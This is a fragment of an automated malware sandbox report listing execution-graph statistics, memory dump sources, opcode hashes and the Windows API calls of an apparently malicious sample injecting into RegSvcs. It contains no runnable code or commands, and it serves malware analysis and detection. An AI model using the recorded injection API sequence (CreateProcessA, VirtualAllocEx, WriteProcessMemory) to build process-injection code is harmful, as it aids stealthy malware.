                                                                        • Opcode Fuzzy Hash: 11c00509d978e22ae2fcc5914081665c6b1f945eb6650859e7e605bc28a4a2f7
                                                                        • Instruction Fuzzy Hash: ABA14A32A002098FCF15DFB5C84099EB7B3FF84304B1685AAE905AB3A5EB71ED55CB54

                                                                        Execution Graph

                                                                        Execution Coverage:8.1%
                                                                        Dynamic/Decrypted Code Coverage:100%
                                                                        Signature Coverage:0%
                                                                        Total number of Nodes:17
                                                                        Total number of Limit Nodes:0

                                                                        Control-flow Graph

                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.1625571688.00000000071A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071A0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_71a0000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 298c5e3526deb62b81376c0670bd5ff233a6902edbf59b38efe7cc08e5c3c42d
                                                                        • Instruction ID: f4fa098ca8d149360c4f2405559037d73e4d92382a377fcfe916243063df5ac9
                                                                        • Opcode Fuzzy Hash: 298c5e3526deb62b81376c0670bd5ff233a6902edbf59b38efe7cc08e5c3c42d
                                                                        • Instruction Fuzzy Hash: 22F1A3B0A0030AAFDB15DF69D844A9EBBF2FF89710F148569E405EB2A1DB30DC45CB90

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.1625571688.00000000071A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071A0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_71a0000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: So
                                                                        • API String ID: 0-2829772482
                                                                        • Opcode ID: dddbb66fb31b5bdd537380a06cefc53e7aa9a85bc726edbfab01f59e4a453dfd
                                                                        • Instruction ID: 44120c27038fe22afdd29bb3a8d71830d7742b5ac8a0fe22e3c1cc5e4001c5f5
                                                                        • Opcode Fuzzy Hash: dddbb66fb31b5bdd537380a06cefc53e7aa9a85bc726edbfab01f59e4a453dfd
                                                                        • Instruction Fuzzy Hash: BD327FB87006059FDB15DF79C484A6ABBF2FF89700B1544A9E406DB3A2DB34EC45CBA1

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 990 1790ce0-1790ce2 991 1790ce5-1790d54 GetConsoleWindow 990->991 992 1790ce4 990->992 995 1790d5d-1790d82 991->995 996 1790d56-1790d5c 991->996 992->991 996->995
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.1599982240.0000000001790000.00000040.00000800.00020000.00000000.sdmp, Offset: 01790000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_1790000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID: ConsoleWindow
                                                                        • String ID:
                                                                        • API String ID: 2863861424-0
                                                                        • Opcode ID: 52c9b431ba5cc370447b139bf75b2fa2a1efa1593bc0c7b082b4070aa55c58ee
                                                                        • Instruction ID: 57d7cf75adbe0e6fbc3ae72974fc862f2d7847372eb79c25f4bbb3c50007f9de
                                                                        • Opcode Fuzzy Hash: 52c9b431ba5cc370447b139bf75b2fa2a1efa1593bc0c7b082b4070aa55c58ee
                                                                        • Instruction Fuzzy Hash: F6114671C103488FDB24DFAAD8457EFFBF4AB49224F24881AD519A7250C7356545CB90

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 1000 1790ce8-1790d54 GetConsoleWindow 1003 1790d5d-1790d82 1000->1003 1004 1790d56-1790d5c 1000->1004 1004->1003
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.1599982240.0000000001790000.00000040.00000800.00020000.00000000.sdmp, Offset: 01790000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_1790000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID: ConsoleWindow
                                                                        • String ID:
                                                                        • API String ID: 2863861424-0
                                                                        • Opcode ID: a661eab0c2121a31f32dd9d548053b00e05a01494ea1710732b9817654521ab0
                                                                        • Instruction ID: f00dffe49809478b9731b80b2d70e1b584ba85fd835e5ac81f8bd3631c8f6a73
                                                                        • Opcode Fuzzy Hash: a661eab0c2121a31f32dd9d548053b00e05a01494ea1710732b9817654521ab0
                                                                        • Instruction Fuzzy Hash: C6114571D00349CFDB24DFAAD8457DFFBF8AB48220F24881AD419A7240CB79A544CFA1

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.1625571688.00000000071A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071A0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_71a0000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: So
                                                                        • API String ID: 0-2829772482
                                                                        • Opcode ID: 158ebe793d86738a6c15f42c69fb8cef953cb6e04157f6921138f1e58eb7e784
                                                                        • Instruction ID: a1d32286da740ad8c68b92a274c7b1b5d2bf13bef558470e670a872758eb4051
                                                                        • Opcode Fuzzy Hash: 158ebe793d86738a6c15f42c69fb8cef953cb6e04157f6921138f1e58eb7e784
                                                                        • Instruction Fuzzy Hash: F6B12A787006058FCB15DF79C498AAABBF2FF89700B5540A9E446DB3A1DB34EC45CBA1

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.1625571688.00000000071A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071A0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_71a0000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: d9bb51a200fe23428b2170e4ad0e18562a163674c88db0960116c139a3854158
                                                                        • Instruction ID: ce17f88b0de8e30c82a98e9f1fdf959fd3f025684922cace03e25d11db3e6cb1
                                                                        • Opcode Fuzzy Hash: d9bb51a200fe23428b2170e4ad0e18562a163674c88db0960116c139a3854158
                                                                        • Instruction Fuzzy Hash: A18173B5B00216DFCB05DF68C4849AEBBF1FF89650B1544AAE915EB3A1D730ED41CBA0
                                                                        • Instruction Fuzzy Hash: 16117CB4B002169FCB15DF78D89486EBBF6EF8964071540AAD805DB3A2DB31DC068BD1
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.1625571688.00000000071A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071A0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_71a0000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 8cdbc613dad853a2dd37a217ca3529f5a31256c83f58edf52d0ac85cb27727f1
                                                                        • Instruction ID: 5b4661be14dd4e705332fa88ea48ff76933f64f5c19b6c5a3ee0adcc0c0472d2
                                                                        • Opcode Fuzzy Hash: 8cdbc613dad853a2dd37a217ca3529f5a31256c83f58edf52d0ac85cb27727f1
                                                                        • Instruction Fuzzy Hash: DA1160B5B011059BCB259B65D9186AFBBF5EB88720F051079E406F3394DF715C49CB90
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.1597346484.000000000145D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0145D000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_145d000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 36dba3e712238e0a66f9469a116caccf835c09763754274a0d957b5f10e5b951
                                                                        • Instruction ID: b4d75a8c1bedc5e538fd4a9fbd13897867c7331cbbdb3237e4725e118df4f553
                                                                        • Opcode Fuzzy Hash: 36dba3e712238e0a66f9469a116caccf835c09763754274a0d957b5f10e5b951
                                                                        • Instruction Fuzzy Hash: 8521CD72804280DFCB06CF54D9C0B16BF72FF88314F2482AADD480A267C33AD466CB92
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.1597499699.000000000146D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0146D000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_146d000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: a6f14a2633b0976cf55fba98dc8f49a251bcab79b87bdac7509de7911a20ab2c
                                                                        • Instruction ID: 6d7c7ce944e2f1d21438a24a964c6a0049cbfb09047ce11780b2640189b9bca8
                                                                        • Opcode Fuzzy Hash: a6f14a2633b0976cf55fba98dc8f49a251bcab79b87bdac7509de7911a20ab2c
                                                                        • Instruction Fuzzy Hash: FE118E75A04240DFDB16CF54D5C4B16BF61FB88318F24C6AAD8494B766C33AD44ACB52
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.1597499699.000000000146D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0146D000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_146d000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 0087aa9c0370ffbcc44a91c72dac69a08dec4055da452c00f01411939cf63ad0
                                                                        • Instruction ID: a26e1e0d08df6d508d6a14e233644c4541d7ed44873b06ce3ddf5958d7ed5f1b
                                                                        • Opcode Fuzzy Hash: 0087aa9c0370ffbcc44a91c72dac69a08dec4055da452c00f01411939cf63ad0
                                                                        • Instruction Fuzzy Hash: 3311B275A04680DFDB12CF14D5C4B1AFF61FB84328F24C6AAD8894B756C33AD446CBA2
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.1625571688.00000000071A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071A0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_71a0000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: bd385af75ca3841ddea7e869cdea958e7f700e55c2f4c6a44b73da0b3322aa10
                                                                        • Instruction ID: e3c254a42aa88b221e974b1df45292f77ab9be7b8425b684e063fc54fe315349
                                                                        • Opcode Fuzzy Hash: bd385af75ca3841ddea7e869cdea958e7f700e55c2f4c6a44b73da0b3322aa10
                                                                        • Instruction Fuzzy Hash: 4701B575B002199FCB10DEAAAC44ABFFBFEFBC8251700843AE505D3240DB35991587A1
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.1625571688.00000000071A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071A0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_71a0000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 7dd9254e9bd66ef36b6e0dc0d70046558a5e2820830f3921e85e694167479abb
                                                                        • Instruction ID: 479c2145e973c881d38e7b448036e28742e2841a112a16b7da060ce1a085c361
                                                                        • Opcode Fuzzy Hash: 7dd9254e9bd66ef36b6e0dc0d70046558a5e2820830f3921e85e694167479abb
                                                                        • Instruction Fuzzy Hash: CC01A7762092D53FCB128E765C108FA7FEDDE4E5617084097F994D7142C129C925DBB0
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.1597346484.000000000145D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0145D000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_145d000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 27bf684f419c1e1299a6545192a900186db04f74a9a1c2d1238e5a942e12f6d3
                                                                        • Instruction ID: 54a5a0e230a8c747bf0eb00cbd8542547f7843f912a0cc3a01ab9c497c376c84
                                                                        • Opcode Fuzzy Hash: 27bf684f419c1e1299a6545192a900186db04f74a9a1c2d1238e5a942e12f6d3
                                                                        • Instruction Fuzzy Hash: F401A771808344ABE7509FA9D884B67BFD8EF41620F18C45BED091A6A7C3759841CA72
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.1625571688.00000000071A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071A0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_71a0000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: e7e151e44970eed402bf92b30211f419ae95a23bf0cf95fc27e35983f007152d
                                                                        • Instruction ID: d2d5d7dbac74602a292f89c9c8f1389e70f92e8103ab0f7fd2f58a199099cea5
                                                                        • Opcode Fuzzy Hash: e7e151e44970eed402bf92b30211f419ae95a23bf0cf95fc27e35983f007152d
                                                                        • Instruction Fuzzy Hash: 1801F274200303EFCB568F75D8106A3BBF6BFC6604B18886AE44287682E735E845CBE1
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.1625571688.00000000071A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071A0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_71a0000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 716e5eccda42f39cdce28f8b364dd402e044ba63198c48c2259fdb8ec5029ff9
                                                                        • Instruction ID: 4b5b54128461002e39adf2f3b70ddad3a15c7b04ec3aded0fdaf658238997102
                                                                        • Opcode Fuzzy Hash: 716e5eccda42f39cdce28f8b364dd402e044ba63198c48c2259fdb8ec5029ff9
                                                                        • Instruction Fuzzy Hash: FE01A4762082D53FCB524EAA5C108FB7FECDE4E6617084067FA94D6142C139C911DB70
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.1625571688.00000000071A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071A0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_71a0000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 8e832ef3162a2176c6592e9fd105a9f7af47de8d2751d34f4a0a2914194a1f9c
                                                                        • Instruction ID: 5256527d759346fbf333da48225257f15cb6216e9c6c295ba86e2b1d9c76ef71
                                                                        • Opcode Fuzzy Hash: 8e832ef3162a2176c6592e9fd105a9f7af47de8d2751d34f4a0a2914194a1f9c
                                                                        • Instruction Fuzzy Hash: 8B01F4B8610703EFCB6A8E79E514623B3E7BFC5205B14883CD40287684EB71E581CBE0
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.1625571688.00000000071A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071A0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_71a0000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 43ab7191c5de8e4e54cd66648a7d2795834173b1ec8d1bb0fbbf83f714eff3ba
                                                                        • Instruction ID: 2b9122b7f22472176392bfa8562a3e31751ecaef6a48617ab8984efee145b5a3
                                                                        • Opcode Fuzzy Hash: 43ab7191c5de8e4e54cd66648a7d2795834173b1ec8d1bb0fbbf83f714eff3ba
                                                                        • Instruction Fuzzy Hash: 57F0C231654342AFC3228A79E805F957FE9EF82B24F04827BE154CB1D2D3B5A84AC751
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.1597346484.000000000145D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0145D000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_145d000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 19f8d7c0ea40bcea1d067c40706da798f23b33a8d7aff670c51d1987a27a7887
                                                                        • Instruction ID: 9f52310055a9ce8ca25d0125f383476d2566cc0b75e638df95ce6189a435967b
                                                                        • Opcode Fuzzy Hash: 19f8d7c0ea40bcea1d067c40706da798f23b33a8d7aff670c51d1987a27a7887
                                                                        • Instruction Fuzzy Hash: E9F06D75409384AEE7148E1AD8C4B67FFD8EF41734F18C49AED085B297C2799844CAB1
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.1625571688.00000000071A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071A0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_71a0000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: eac8c16f76e17f2489c21acef587868cfda2bfec35095f766296fc64c6579cbd
                                                                        • Instruction ID: e66d40385cb98c043455b8a8c70b0211766f149ff2192730fc2e92c01a631569
                                                                        • Opcode Fuzzy Hash: eac8c16f76e17f2489c21acef587868cfda2bfec35095f766296fc64c6579cbd
                                                                        • Instruction Fuzzy Hash: 8FF012A22041E83F8B529E9A5C10CFF7FEDDA8E5617084056FEA8D2241C429C920ABB0
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.1625571688.00000000071A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071A0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_71a0000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: aeeb204d7542c73bad37b13eb9168837e42173866b7cbc082f8140e145efa981
                                                                        • Instruction ID: e751a549d9e0ad69ccb0a21ce8ac9e0b98ac009263ebc0bfc9a2b5201dca195e
                                                                        • Opcode Fuzzy Hash: aeeb204d7542c73bad37b13eb9168837e42173866b7cbc082f8140e145efa981
                                                                        • Instruction Fuzzy Hash: C0E0657210C3419FC381DA34A850993BBE4EF92210B15C86EE584C7581D731D481C791

                                                                        Execution Graph

                                                                        Execution Coverage:11%
                                                                        Dynamic/Decrypted Code Coverage:100%
                                                                        Signature Coverage:0%
                                                                        Total number of Nodes:345
                                                                        Total number of Limit Nodes:24

                                                                        Control-flow Graph

                                                                        APIs
                                                                        • GetCurrentProcess.KERNEL32 ref: 0086D2FE
                                                                        • GetCurrentThread.KERNEL32 ref: 0086D33B
                                                                        • GetCurrentProcess.KERNEL32 ref: 0086D378
                                                                        • GetCurrentThreadId.KERNEL32 ref: 0086D3D1
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.1496995206.0000000000860000.00000040.00000800.00020000.00000000.sdmp, Offset: 00860000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_860000_VWGccZGgix.jbxd
                                                                        Similarity
                                                                        • API ID: Current$ProcessThread
                                                                        • String ID:
                                                                        • API String ID: 2063062207-0
                                                                        • Opcode ID: d5dd0e8fee115b549b38c1def89ddab0ede12acd7ca2f5125537aede468bfc7b
                                                                        • Instruction ID: afb557ff4b9e1d256f068cd4a5e52162cc54a70c8e884abb5890012ea2897d80
                                                                        • Opcode Fuzzy Hash: d5dd0e8fee115b549b38c1def89ddab0ede12acd7ca2f5125537aede468bfc7b
                                                                        • Instruction Fuzzy Hash: E25165B09007498FDB14CFAAD548BEEBBF1FF88304F248059E009A7391D7749944CB66

                                                                        Control-flow Graph

                                                                        APIs
                                                                        • GetCurrentProcess.KERNEL32 ref: 0086D2FE
                                                                        • GetCurrentThread.KERNEL32 ref: 0086D33B
                                                                        • GetCurrentProcess.KERNEL32 ref: 0086D378
                                                                        • GetCurrentThreadId.KERNEL32 ref: 0086D3D1
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.1496995206.0000000000860000.00000040.00000800.00020000.00000000.sdmp, Offset: 00860000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_860000_VWGccZGgix.jbxd
                                                                        Similarity
                                                                        • API ID: Current$ProcessThread
                                                                        • String ID:
                                                                        • API String ID: 2063062207-0
                                                                        • Opcode ID: 42929427e1832e990c239ee2fa79d55f722aea74c9060b8e6472a26edb24474a
                                                                        • Instruction ID: 177b1454fbe1451e7eaa8a1263e54a762db37629f36da00eb321acfff18efd0e
                                                                        • Opcode Fuzzy Hash: 42929427e1832e990c239ee2fa79d55f722aea74c9060b8e6472a26edb24474a
                                                                        • Instruction Fuzzy Hash: B25145B0E007099FDB14CFAAD548BEEBBF1FB88314F248459E109A7390D7749944CB66

                                                                        Control-flow Graph

                                                                        APIs
                                                                        • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 06F27DFE
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.1507000276.0000000006F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F20000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_6f20000_VWGccZGgix.jbxd
                                                                        Similarity
                                                                        • API ID: CreateProcess
                                                                        • String ID:
                                                                        • API String ID: 963392458-0
                                                                        • Opcode ID: c53ebf9166578f54e9d6d28c910304f40fb1c8bd1d9d84ae81e11d23e90da581
                                                                        • Instruction ID: fef6d2457e525467627cd79cf66118bb0271444cc2f4d69afaf5e7b77bae4c19
                                                                        • Opcode Fuzzy Hash: c53ebf9166578f54e9d6d28c910304f40fb1c8bd1d9d84ae81e11d23e90da581
                                                                        • Instruction Fuzzy Hash: 9C915E71D0072ACFEB50DFA8C841BEEBBB2BF44310F1485A9D818A7280DB759985CF91

                                                                        Control-flow Graph

                                                                        APIs
                                                                        • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 06F27DFE
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.1507000276.0000000006F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F20000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_6f20000_VWGccZGgix.jbxd
                                                                        Similarity
                                                                        • API ID: CreateProcess
                                                                        • String ID:
                                                                        • API String ID: 963392458-0
                                                                        • Opcode ID: 978856e5926e18854b02e2d798fb6c4f851c699b55ee1b97dd086cccd25ad142
                                                                        • Instruction ID: ee3a3bc07df29b569fb119d62fafc1e0b32d829a547a65764158e6e4a54e5ee3
                                                                        • Opcode Fuzzy Hash: 978856e5926e18854b02e2d798fb6c4f851c699b55ee1b97dd086cccd25ad142
                                                                        • Instruction Fuzzy Hash: AD915E71D0072ACFEB50DFA8C8417EEBBB2BF44310F1485A9D818A7280DB759985CF91

                                                                        Control-flow Graph

                                                                        APIs
                                                                        • GetModuleHandleW.KERNELBASE(00000000), ref: 0086B246
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.1496995206.0000000000860000.00000040.00000800.00020000.00000000.sdmp, Offset: 00860000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_860000_VWGccZGgix.jbxd
                                                                        Similarity
                                                                        • API ID: HandleModule
                                                                        • String ID:
                                                                        • API String ID: 4139908857-0
                                                                        • Opcode ID: 6d7fb81644768e9579ee3b9ea79a82db48e15c36d9fb993f944a4eddbf1225ea
                                                                        • Instruction ID: c0760fb552f4d7bf153ed1e7abe36a0ab875c3f2eece4480559031f8d50bcdf8
                                                                        • Opcode Fuzzy Hash: 6d7fb81644768e9579ee3b9ea79a82db48e15c36d9fb993f944a4eddbf1225ea
                                                                        • Instruction Fuzzy Hash: D2716570A00B048FD724DF6AD4517ABBBF5FF88304F108929D49AD7A40DB35E889CB92

                                                                        Control-flow Graph

                                                                        APIs
                                                                        • CreateActCtxA.KERNEL32(?), ref: 00865DA9
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.1496995206.0000000000860000.00000040.00000800.00020000.00000000.sdmp, Offset: 00860000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_860000_VWGccZGgix.jbxd
                                                                        Similarity
                                                                        • API ID: Create
                                                                        • String ID:
                                                                        • API String ID: 2289755597-0
                                                                        • Opcode ID: 3a3636d9bb94ec62383906cdefdd15a1b1ef6c1d09edf4db2d154a25de1f3ea9
                                                                        • Instruction ID: 4a5df9cc967f3095f95d2a6d89640fd7e859fecabd7c1f9dd34445378960855d
                                                                        • Opcode Fuzzy Hash: 3a3636d9bb94ec62383906cdefdd15a1b1ef6c1d09edf4db2d154a25de1f3ea9
                                                                        • Instruction Fuzzy Hash: 2641C1B0C00719CBEB24DFA9C844BDEFBB5BF49304F20816AD448AB255DB765946CF50

                                                                        Control-flow Graph

                                                                        APIs
                                                                        • CreateActCtxA.KERNEL32(?), ref: 00865DA9
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.1496995206.0000000000860000.00000040.00000800.00020000.00000000.sdmp, Offset: 00860000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_860000_VWGccZGgix.jbxd
                                                                        Similarity
                                                                        • API ID: Create
                                                                        • String ID:
                                                                        • API String ID: 2289755597-0
                                                                        • Opcode ID: 8f9b8df8068bf0cc483f8391a0209f4245dae9970d87a0e322f60c54291ae8e9
                                                                        • Instruction ID: bdbf9fe436f33e0207c80883701472f634a34454f5e93ca18c7d808aebe41568
                                                                        • Opcode Fuzzy Hash: 8f9b8df8068bf0cc483f8391a0209f4245dae9970d87a0e322f60c54291ae8e9
                                                                        • Instruction Fuzzy Hash: CD41D0B0C00B19CBEB24DFA9C844B8EFBF5BF49304F20816AD408AB255DB766945CF90

                                                                        Control-flow Graph

                                                                        APIs
                                                                        • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 06F279D0
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.1507000276.0000000006F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F20000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_6f20000_VWGccZGgix.jbxd
                                                                        Similarity
                                                                        • API ID: MemoryProcessWrite
                                                                        • String ID:
                                                                        • API String ID: 3559483778-0
                                                                        • Opcode ID: e942578705fa88a2df0217a9819b2c9f5570ab5164130041f9937423eb630b70
                                                                        • Instruction ID: 4f25deef4d676f440de781d395603fb1d7b00dc19364427774423b84cf5a6474
                                                                        • Opcode Fuzzy Hash: e942578705fa88a2df0217a9819b2c9f5570ab5164130041f9937423eb630b70
                                                                        • Instruction Fuzzy Hash: B0314776D00319DFDB10DFAAD841BDEBBF5FF88220F14842AE559A7240C7759910CBA0

                                                                        Control-flow Graph

                                                                        [Control-flow graph figure: 4ba37b0-4ba38a2, calling CreateIconFromResourceEx]
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.1505472063.0000000004BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BA0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_4ba0000_VWGccZGgix.jbxd
                                                                        Similarity
                                                                        • API ID: CreateFromIconResource
                                                                        • String ID:
                                                                        • API String ID: 3668623891-0
                                                                        • Opcode ID: 68d78fa99e87f6dadc04abd7015785654ac94e57623dfc9f1386609eed6f2185
                                                                        • Instruction ID: 20a0ce31a555e89c30912a8df9d8105c4d3d303d82cae1e0cab7bbce379fd890
                                                                        • Opcode Fuzzy Hash: 68d78fa99e87f6dadc04abd7015785654ac94e57623dfc9f1386609eed6f2185
                                                                        • Instruction Fuzzy Hash: 1F317C71904348DFDB11CFA9D844AEEBFF9EF49310F14809AE954A7221C336D850DBA1

                                                                        Control-flow Graph

                                                                        APIs
                                                                        • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 06F278EE
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.1507000276.0000000006F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F20000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_6f20000_VWGccZGgix.jbxd
                                                                        Similarity
                                                                        • API ID: AllocVirtual
                                                                        • String ID:
                                                                        • API String ID: 4275171209-0
                                                                        • Opcode ID: cec47c3c5fce10fc5898600037f87521c4bafbef7e4d4cc0e7ad6efbdf9db765
                                                                        • Instruction ID: 4d8cbacb2e68c30f6099f0024f45309cceaa7fdb0f7ba37e3ac49a37360412d7
                                                                        • Opcode Fuzzy Hash: cec47c3c5fce10fc5898600037f87521c4bafbef7e4d4cc0e7ad6efbdf9db765
                                                                        • Instruction Fuzzy Hash: 03217A35D00259DFDB20DFAAD840ADEBBF5EF48310F24841AE519A7210C735A900CFA1

                                                                        Control-flow Graph

                                                                        APIs
                                                                        • DrawTextExW.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,06C838ED,?,?), ref: 06C8399F
                                                                        Memory Dump Source
